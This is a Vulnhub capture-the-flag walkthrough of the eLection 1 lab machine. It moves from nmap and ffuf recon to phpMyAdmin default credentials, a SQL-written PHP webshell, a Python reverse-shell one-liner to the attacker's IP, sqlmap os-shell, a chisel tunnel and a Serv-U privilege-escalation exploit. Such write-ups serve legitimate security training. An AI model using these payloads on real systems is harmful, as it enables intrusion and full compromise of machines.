Home Vulnhub - eLection 1
Post
Cancel
Preview Image

Vulnhub - eLection 1

By yufongg
Posted 2022-02-15 Updated 2022-08-09 6 min read

Recon

NMAP Complete Scan 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

# Nmap 7.92 scan initiated Mon Feb 14 22:10:40 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/eLection-1/192.168.110.29/scans/_full_tcp_nmap.txt -oX /root/vulnHub/eLection-1/192.168.110.29/scans/xml/_full_tcp_nmap.xml 192.168.110.29
Nmap scan report for 192.168.110.29
Host is up, received arp-response (0.00073s latency).
Scanned at 2022-02-14 22:10:42 +08 for 15s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCoqt4FP0lhkJ0tTiMEUrVqRIcNKgQK22LJCOIVa1yoZf+bgOqsR4mIDjgpaJm/SDrAzRhVlD1dL6apkv7T7iceuo5QDXYvRLWS+PfsEaGwGpEVtpTCl/BjDVVtohdzgErXS69pJhgo9a1yNgVrH/W2SUE1b36ODSNqVb690+aP6jjJdyh2wi8GBlNMXBy6V5hR/qmFC55u7F/z5oG1tZxeZpDHbgdM94KRO9dR0WfKDIBQGa026GGcXtN10wtui2UHo65/6WgIG1LxgjppvOQUBMzj1SHuYqnKQLZyQ18E8oxLZTjc6OC898TeYMtyyKW0viUzeaqFxXPDwdI6G91J
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO9gF8Fv+Uox9ftsvK/DNkPNObtE4BiuaXjwksbOizwtXBepSbhUTyL5We/fWe7x62XW0CMFJWcuQsBNS7IyjsE=
|   256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINfCRDfwNshxW7uRiu76SMZx2hg865qS6TApHhvwKSH5
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:BC:04:D0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=2/14%OT=22%CT=1%CU=43441%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=620A62F1%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10D%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Uptime guess: 21.309 days (since Mon Jan 24 14:46:23 2022)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.73 ms 192.168.110.29

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 14 22:10:57 2022 -- 1 IP address (1 host up) scanned in 17.93 seconds

TCP/80 (HTTP)

FFUF - common.txt 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

┌──(root💀kali)-[~/vulnHub/eLection-1]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php'

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.29/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]
index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]
javascript              [Status: 301, Size: 321, Words: 20, Lines: 10]
phpmyadmin              [Status: 301, Size: 321, Words: 20, Lines: 10]
phpinfo.php             [Status: 200, Size: 95531, Words: 4724, Lines: 1170]
phpinfo.php             [Status: 200, Size: 95531, Words: 4724, Lines: 1170]
robots.txt              [Status: 200, Size: 30, Words: 1, Lines: 5]
robots.txt              [Status: 200, Size: 30, Words: 1, Lines: 5]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 268 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
  • javascript
  • phpmyadmin
  • phpinfo.php
  • robots.txt

FFUF - directory-list-2.3-medium.txt 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

┌──(root💀kali)-[~/vulnHub/eLection-1]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '.html,.txt,.php'

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.29/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]
javascript              [Status: 301, Size: 321, Words: 20, Lines: 10]
robots.txt              [Status: 200, Size: 30, Words: 1, Lines: 5]
election                [Status: 301, Size: 319, Words: 20, Lines: 10]
phpmyadmin              [Status: 301, Size: 321, Words: 20, Lines: 10]
phpinfo.php             [Status: 200, Size: 95531, Words: 4724, Lines: 1170]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 9187 req/sec :: Duration: [0:02:18] :: Errors: 0 ::
  • election

Initial Foothold

TCP/80 (HTTP) - Weak Credentials + Insert Webshell at phpMyAdmin

  1. View enumerated directories
    • javascript
      • 403 Forbidden
    • phpmyadmin
    • robots.txt
      1
2
3
4
5
6

        ┌──(root💀kali)-[~/vulnHub/eLection-1]
  └─# curl 192.168.110.29/robots.txt
  admin
  wordpress
  user
  election
    • election
      • No vulnerabilities found
  2. Proceed to phpmyadmin, login w/ default credentials (root:toor)
  3. Proceed to election -> tb_panitia
  4. Crack md5 hash
    • Failed to crack, exhausted rockyou.txt
  5. Insert web shell, Select election database -> SQL
    1
2

     # Payload
 SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/webshell.php"

  6. Execute command at webshell.php
  7. Obtain www-data shell
    1
2

     # Payload
 python+-c+'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("192.168.110.4",4444));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'

Initial Foothold (2) - Directory Enumeration (Log File)

  1. Instead of inserting a webshell via phpMyAdmin, directory enumerate election
    1
2

     ┌──(root💀kali)-[~/vulnHub/eLection-1]
 └─# ffuf -u http://192.168.110.29/election/FUZZ -w /usr/share/wordlists/dirb/common.txt -e .html,.txt,.php,.cgi,.log --recursion -of html -o election_fuzz.html -fc 403

    • system.log
  2. View system.log
    • love:P@$$w0rd@123
  3. SSH w/ love:P@$$w0rd@123

Initial Foothold (3) - SQLMap OS-SHELL

  1. Login to phpMyAdmin w/ root:toor
  2. Crack the hash w/ an online tool
    • 1234:Zxc123!@#
  3. Proceed to /election/admin & login w/ 1234:Zxc123!@#

  4. Search for exploits for election

    Exploit TitlePath
    eLection 2.0 - ‘id’ SQL Injectionphp/webapps/48122.txt
  5. Try php/webapps/48122.txt
    1. Login
    2. Proceed to Candidates
    3. Intercept w/ burp, edit request according to php/webapps/48122.txt
      • Right-Click -> Save item -> sqli.txt
    4. Use SQLMap to insert shell, allowing us to do RCE
      1
2

       ┌──(root💀kali)-[~/vulnHub/eLection-1/192.168.110.29/exploit]
 └─# sqlmap -r sqli.txt --level=5 --risk=3 --os-shell -p id

  6. Download php-reverse-shell.php onto target
  7. Obtain www-data shell
    1
2

     ┌──(root💀kali)-[~/vulnHub/eLection-1]
 └─# curl http://192.168.110.29/php-reverse-shell.php

Privilege Escalation

Love - Via Creds Found

  1. View files in /var/www/html, look for files that could contain credentials
    1
2
3
4
5

     www-data@election:/var/www/html$ find $(pwd)
 ...
 /var/www/html/election/admin/logs
 /var/www/html/election/admin/logs/system.log
 ...
  2. View system.log
    1
2
3
4
5
6

     www-data@election:/var/www/html/election/admin/logs$ cat system.log 
 [2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
 [2020-04-03 00:13:53] Love added candidate 'Love'.
 [2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
 [2022-02-14 21:39:13] Love has been logged in from Unknown IP on Chrome (Linux).
 www-data@election:/var/www/html/election/admin/logs$
    • love:P@$$w0rd@123
  3. Switch to love w/ love:P@$$w0rd@123
  4. User Flag
    1
2
3

     love@election:~$ cat /home/love/Desktop/user.txt
 cd38ac698c0d793a5236d01003f692b0
 love@election:~$

Root - Via Serv-U < 15.1.7 Exploit

  1. Ran linpeas
    • TCP/43958
  2. Open up the internal service (TCP/43958) w/ chisel
    • Kali
      1
2

        ┌──(root💀kali)-[~/vulnHub/eLection-1]
  └─# chisel server --reverse --port 1337
    • Target
      1

        love@election:/tmp$ ./chiselLinux64 client 192.168.110.4:1337 R:8888:127.0.0.1:43958 &
  3. Proceed to localhost:8888
    • Serv-U 15.1.6.25

  4. Search exploits for Serv-U 15.1.6.25

    Exploit TitlePath
    Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)linux/local/47009.c
    Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)multiple/local/47173.sh
  5. Try multiple/local/47173.sh
    1
2

     love@election:/tmp$ chmod +x 47173.sh 
 love@election:/tmp$ ./47173.sh

  6. Root Flag
    1
2
3
4
5
6

     sh-4.4# cd /root
 sh-4.4# ls
 root.txt
 sh-4.4# cat root.txt 
 5238feefc4ffe09645d97e9ee49bc3a6
 sh-4.4#
Vulnhub, Linux
exploit/sqli/rce linux-priv-esc/linux-creds-found pivot tcp/80-http/web-app-cms-exploit
This post is licensed under CC BY 4.0 by the author.
Recent Update
Contents

Vulnhub - Hacker kid 1.0.1

Vulnhub - Billy Madison 1.1

Comments powered by Disqus.